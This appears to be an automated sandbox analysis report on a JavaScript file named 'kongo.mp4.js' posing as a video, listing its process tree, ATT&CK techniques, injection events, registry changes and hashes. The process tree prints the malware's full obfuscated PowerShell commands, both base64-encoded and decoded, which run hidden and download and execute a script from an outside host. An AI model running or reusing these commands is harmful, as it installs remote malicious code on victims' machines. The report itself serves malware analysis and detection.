9f31852148ac6004937ef640870d442afaa1a1064aa2cf540ec0db4827c8aee3

Analysis

max time kernel
194s
max time network
203s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-01-2025 18:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kongo.mp4.js
Size

102KB
MD5

3c38beb47e908f44e723eeecc9263200
SHA1

aa1a371919fe804ab727bb65c1a7bb96224014a9
SHA256

9f31852148ac6004937ef640870d442afaa1a1064aa2cf540ec0db4827c8aee3
SHA512

46608dec2ca73d340fcefac08c74ed20a5395378777431d6a911b4192765946c09f8aa54485496341f12c9451f068a81e63c05197e4c83f51a32da98ef5967b4
SSDEEP

3072:uRKoa6RMqYPXIJOjW47hnrX2D45IbhmwOho2Big:uRFYPYU97hnrGD3mwOu2BN

Score

10^/10

discovery execution

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3780 created 3236	3780	powershell.exe	52
PID 4812 created 3236	4812	powershell.exe	52

Blocklisted process makes network request 8 IoCs

flow	pid	Process
2	3780	powershell.exe
21	3300	powershell.exe
23	3300	powershell.exe
24	3300	powershell.exe
32	4812	powershell.exe
34	5932	powershell.exe
35	5932	powershell.exe
36	5932	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3780	powershell.exe
4812	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3780 set thread context of 3300	3780	powershell.exe	83
PID 4812 set thread context of 5932	4812	powershell.exe	97

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3200	powershell.exe
3200	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
5496	powershell.exe
5496	powershell.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	5496	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 5568 wrote to memory of 3200	5568	wscript.exe	77
PID 5568 wrote to memory of 3200	5568	wscript.exe	77
PID 3200 wrote to memory of 3780	3200	powershell.exe	79
PID 3200 wrote to memory of 3780	3200	powershell.exe	79
PID 3200 wrote to memory of 3780	3200	powershell.exe	79
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 3780 wrote to memory of 3300	3780	powershell.exe	83
PID 1164 wrote to memory of 5496	1164	WScript.exe	89
PID 1164 wrote to memory of 5496	1164	WScript.exe	89
PID 5496 wrote to memory of 4812	5496	powershell.exe	91
PID 5496 wrote to memory of 4812	5496	powershell.exe	91
PID 5496 wrote to memory of 4812	5496	powershell.exe	91
PID 4480 wrote to memory of 1276	4480	cmd.exe	96
PID 4480 wrote to memory of 1276	4480	cmd.exe	96
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97
PID 4812 wrote to memory of 5932	4812	powershell.exe	97

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3236
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\kongo.mp4.js
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4ATgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGsAbABpAHAAZABlAHIAaQBxAC4AcwBoAG8AcAAvAHMAaAAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://klipderiq.shop/sh';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3300
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kongo.mp4.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4ATgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGsAbABpAHAAZABlAHIAaQBxAC4AcwBoAG8AcAAvAHMAaAAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5496
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://klipderiq.shop/sh';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Windows\system32\wscript.exe
    wscript kongo.mp4.js
    3⤵
    PID:1276
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:5932

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:1892

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
0740d74a01fccf2ba3858f01af6b2f7b

SHA1
112cd26d33470494c795622c3c13eb8081c0c562

SHA256
a4c0f0b9ea6430289e4423f7c113af52e36f30fa47b8a6a1bbf7f5aeb91bce1e

SHA512
ad551db5d8a3f1cad3920c49d7ac8197a76e283f125ba6f4b4becfb3efa0d090adbf853dab173c8bbd818bb2d06824b6a9479235036185887e9191e3bd0b35a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\ab665114-ef9a-459b-b3fc-191b6febd12f.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bu3ljnas.jbh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3200-0-0x00007FFA94D73000-0x00007FFA94D75000-memory.dmp

Filesize
8KB

Download
memory/3200-1-0x0000019ED3FF0000-0x0000019ED4012000-memory.dmp

Filesize
136KB

Download
memory/3200-10-0x00007FFA94D70000-0x00007FFA95832000-memory.dmp

Filesize
10.8MB

Download
memory/3200-11-0x00007FFA94D70000-0x00007FFA95832000-memory.dmp

Filesize
10.8MB

Download
memory/3200-12-0x00007FFA94D70000-0x00007FFA95832000-memory.dmp

Filesize
10.8MB

Download
memory/3200-15-0x00007FFA94D70000-0x00007FFA95832000-memory.dmp

Filesize
10.8MB

Download
memory/3780-106-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-90-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-20-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/3780-19-0x0000000005F00000-0x0000000005F66000-memory.dmp

Filesize
408KB

Download
memory/3780-29-0x00000000060C0000-0x0000000006417000-memory.dmp

Filesize
3.3MB

Download
memory/3780-31-0x00000000065D0000-0x00000000065EE000-memory.dmp

Filesize
120KB

Download
memory/3780-32-0x0000000006600000-0x000000000664C000-memory.dmp

Filesize
304KB

Download
memory/3780-33-0x00000000075B0000-0x0000000007646000-memory.dmp

Filesize
600KB

Download
memory/3780-34-0x0000000006B00000-0x0000000006B1A000-memory.dmp

Filesize
104KB

Download
memory/3780-35-0x0000000006B70000-0x0000000006B92000-memory.dmp

Filesize
136KB

Download
memory/3780-36-0x0000000007E60000-0x0000000008406000-memory.dmp

Filesize
5.6MB

Download
memory/3780-37-0x0000000007900000-0x000000000794A000-memory.dmp

Filesize
296KB

Download
memory/3780-38-0x0000000008A90000-0x000000000910A000-memory.dmp

Filesize
6.5MB

Download
memory/3780-40-0x0000000074A60000-0x0000000075211000-memory.dmp

Filesize
7.7MB

Download
memory/3780-41-0x0000000007CB0000-0x0000000007E0C000-memory.dmp

Filesize
1.4MB

Download
memory/3780-42-0x00000000085E0000-0x0000000008712000-memory.dmp

Filesize
1.2MB

Download
memory/3780-43-0x0000000008710000-0x0000000008838000-memory.dmp

Filesize
1.2MB

Download
memory/3780-44-0x0000000008840000-0x000000000896A000-memory.dmp

Filesize
1.2MB

Download
memory/3780-45-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-48-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-74-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-84-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-17-0x0000000005860000-0x0000000005E8A000-memory.dmp

Filesize
6.2MB

Download
memory/3780-104-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-102-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-100-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-98-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-96-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-94-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-18-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/3780-88-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-86-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-82-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-80-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-92-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-78-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-76-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-73-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-70-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-68-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-64-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-62-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-60-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-58-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-56-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-54-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-52-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-46-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-66-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-50-0x0000000008840000-0x0000000008963000-memory.dmp

Filesize
1.1MB

Download
memory/3780-1367-0x00000000089A0000-0x0000000008A24000-memory.dmp

Filesize
528KB

Download
memory/3780-1368-0x000000002C180000-0x000000002C200000-memory.dmp

Filesize
512KB

Download
memory/3780-1369-0x00000000066E0000-0x000000000672C000-memory.dmp

Filesize
304KB

Download
memory/3780-1371-0x000000002C110000-0x000000002C164000-memory.dmp

Filesize
336KB

Download
memory/3780-16-0x0000000005110000-0x0000000005146000-memory.dmp

Filesize
216KB

Download
memory/4812-1395-0x00000000054D0000-0x0000000005827000-memory.dmp

Filesize
3.3MB

Download
memory/4812-1406-0x0000000007600000-0x0000000007732000-memory.dmp

Filesize
1.2MB

Download
memory/4812-2729-0x0000000005C00000-0x0000000005C84000-memory.dmp

Filesize
528KB

Download